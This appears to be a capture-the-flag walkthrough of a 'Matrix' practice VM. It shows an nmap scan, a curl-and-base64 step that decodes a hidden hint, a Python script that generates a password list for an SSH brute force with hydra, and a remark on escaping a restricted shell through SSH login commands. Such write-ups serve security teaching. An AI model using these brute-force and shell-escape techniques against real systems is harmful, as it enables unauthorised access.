On this post
- Information Gathering
This is your last chance. After this, there is no turning back. You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes.
Let’s start with a nmap scan to establish the available services in the host.
# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129 ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0) | ssh-hostkey: | 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA) | 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA) |_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519) 80/tcp open http syn-ack ttl 64 SimpleHTTPServer 0.6 (Python 2.7.14) | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: SimpleHTTP/0.6 Python/2.7.14 |_http-title: Welcome in Matrix 31337/tcp open http syn-ack ttl 64 SimpleHTTPServer 0.6 (Python 2.7.14) | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: SimpleHTTP/0.6 Python/2.7.14 |_http-title: Welcome in Matrix
31337/tcp open. The interesting bit is that both
http servers are Python’s
Cypher left a message in the HTML source code of
# curl -s 192.168.30.129:31337 | sed '71!d' | sed -r 's/\s+//' | cut -d'>' -f2 | cut -d'<' -f1 | base64 -d && echo echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
The message is redirected to a file. Perhaps the file is present?
What do we have here?
Using an online interpreter, one can easily decipher (no pun intended) it, in which case, the message is:
You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
Entering the Matrix
From the message, it’s clear that we need to brute-force our way into the Matrix. The tool of choice here is
hydra. It’s equally easy to use Python to generate a password list for
import itertools import os import string charset = string.ascii_letters + string.digits killer = 'k1ll0r' password = open('passwords.txt', 'w') string = '' for (a, b) in itertools.product(charset, repeat=2): string += killer + a + b + '\n' password.write(string) password.close() os.system('sort -R < password.txt > pass.txt && rm passwords.txt && mv pass.txt passwords.txt')
The random sort at the end is for good measure—hopefully luck is on our side—and we don’t have go all the way to the end to get our password.
Time to give it a shot.
Awesome. Took less than a minute.
Bypass Restricted Shell
I give to you a restricted shell. Damn.
No sweat. We can log out and log back in again, making use of the fact that SSH executes command upon login like so.
The surprise doesn’t end here.
I guess it’s over.
What’s the Flag?
Getting the flag is one command away.